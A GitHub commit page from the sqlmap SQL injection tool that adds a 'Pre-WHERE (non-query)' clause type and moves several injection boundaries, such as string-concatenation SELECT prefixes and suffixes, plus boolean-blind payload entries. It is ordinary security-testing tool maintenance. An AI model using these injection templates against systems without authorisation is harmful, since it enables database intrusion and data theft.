Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 38fcc5a

Browse files
stamparmstamparm
committed
Update for pre-WHERE payloads
1 parent 674d516 commit 38fcc5a

6 files changed

Lines changed: 171 additions & 171 deletions

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,7 @@
2020
from lib.core.revision import getRevisionNumber
2121

2222
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
23-
VERSION = "1.0.4.9"
23+
VERSION = "1.0.4.10"
2424
REVISION = getRevisionNumber()
2525
STABLE = VERSION.count('.') <= 2
2626
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")

xml/boundaries.xml

Lines changed: 43 additions & 44 deletions
Original file line numberDiff line numberDiff line change
@@ -31,6 +31,7 @@ Tag: <boundary>
3131
6: TOP
3232
7: Table name
3333
8: Column name
34+
9: Pre-WHERE (non-query)
3435
3536
A comma separated list of these values is also possible.
3637
@@ -422,7 +423,7 @@ Formats:
422423
<!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
423424
<boundary>
424425
<level>5</level>
425-
<clause>1</clause>
426+
<clause>9</clause>
426427
<where>1,2</where>
427428
<ptype>2</ptype>
428429
<prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -431,7 +432,7 @@ Formats:
431432

432433
<boundary>
433434
<level>5</level>
434-
<clause>1</clause>
435+
<clause>9</clause>
435436
<where>1,2</where>
436437
<ptype>2</ptype>
437438
<prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -440,7 +441,7 @@ Formats:
440441

441442
<boundary>
442443
<level>4</level>
443-
<clause>1</clause>
444+
<clause>9</clause>
444445
<where>1,2</where>
445446
<ptype>1</ptype>
446447
<prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -449,7 +450,7 @@ Formats:
449450

450451
<boundary>
451452
<level>4</level>
452-
<clause>1</clause>
453+
<clause>9</clause>
453454
<where>1,2</where>
454455
<ptype>2</ptype>
455456
<prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -458,7 +459,7 @@ Formats:
458459

459460
<boundary>
460461
<level>5</level>
461-
<clause>1</clause>
462+
<clause>9</clause>
462463
<where>1,2</where>
463464
<ptype>4</ptype>
464465
<prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
@@ -467,12 +468,48 @@ Formats:
467468

468469
<boundary>
469470
<level>4</level>
470-
<clause>1</clause>
471+
<clause>9</clause>
471472
<where>1,2</where>
472473
<ptype>1</ptype>
473474
<prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
474475
<suffix>[GENERIC_SQL_COMMENT]</suffix>
475476
</boundary>
477+
478+
<boundary>
479+
<level>5</level>
480+
<clause>9</clause>
481+
<where>1</where>
482+
<ptype>2</ptype>
483+
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
484+
<suffix>)||'</suffix>
485+
</boundary>
486+
487+
<boundary>
488+
<level>5</level>
489+
<clause>9</clause>
490+
<where>1</where>
491+
<ptype>2</ptype>
492+
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
493+
<suffix>)||'</suffix>
494+
</boundary>
495+
496+
<boundary>
497+
<level>5</level>
498+
<clause>9</clause>
499+
<where>1</where>
500+
<ptype>1</ptype>
501+
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
502+
<suffix>)+'</suffix>
503+
</boundary>
504+
505+
<boundary>
506+
<level>5</level>
507+
<clause>9</clause>
508+
<where>1</where>
509+
<ptype>2</ptype>
510+
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
511+
<suffix>)+'</suffix>
512+
</boundary>
476513
<!-- End of pre-WHERE generic boundaries -->
477514

478515
<!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
@@ -549,44 +586,6 @@ Formats:
549586
</boundary>
550587
<!-- End of pre-WHERE derived table boundaries -->
551588

552-
<!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
553-
<boundary>
554-
<level>5</level>
555-
<clause>1</clause>
556-
<where>1</where>
557-
<ptype>2</ptype>
558-
<prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
559-
<suffix>)||'</suffix>
560-
</boundary>
561-
562-
<boundary>
563-
<level>5</level>
564-
<clause>1</clause>
565-
<where>1</where>
566-
<ptype>2</ptype>
567-
<prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
568-
<suffix>)||'</suffix>
569-
</boundary>
570-
571-
<boundary>
572-
<level>5</level>
573-
<clause>1</clause>
574-
<where>1</where>
575-
<ptype>1</ptype>
576-
<prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
577-
<suffix>)+'</suffix>
578-
</boundary>
579-
580-
<boundary>
581-
<level>5</level>
582-
<clause>1</clause>
583-
<where>1</where>
584-
<ptype>2</ptype>
585-
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
586-
<suffix>)+'</suffix>
587-
</boundary>
588-
<!-- End of INSERT/UPDATE generic boundaries -->
589-
590589
<!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
591590
<boundary>
592591
<level>4</level>

xml/payloads/01_boolean_blind.xml

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -53,6 +53,7 @@ Tag: <test>
5353
6: TOP
5454
7: Table name
5555
8: Column name
56+
9: Pre-WHERE (non-query)
5657
5758
A comma separated list of these values is also possible.
5859
@@ -159,7 +160,7 @@ Tag: <test>
159160
<stype>1</stype>
160161
<level>1</level>
161162
<risk>1</risk>
162-
<clause>1</clause>
163+
<clause>1,9</clause>
163164
<where>1</where>
164165
<vector>AND [INFERENCE]</vector>
165166
<request>
@@ -175,7 +176,7 @@ Tag: <test>
175176
<stype>1</stype>
176177
<level>1</level>
177178
<risk>3</risk>
178-
<clause>1</clause>
179+
<clause>1,9</clause>
179180
<where>2</where>
180181
<vector>OR [INFERENCE]</vector>
181182
<request>
@@ -191,7 +192,7 @@ Tag: <test>
191192
<stype>1</stype>
192193
<level>3</level>
193194
<risk>3</risk>
194-
<clause>1</clause>
195+
<clause>1,9</clause>
195196
<where>1</where>
196197
<vector>OR NOT [INFERENCE]</vector>
197198
<request>

0 commit comments

Comments
 (0)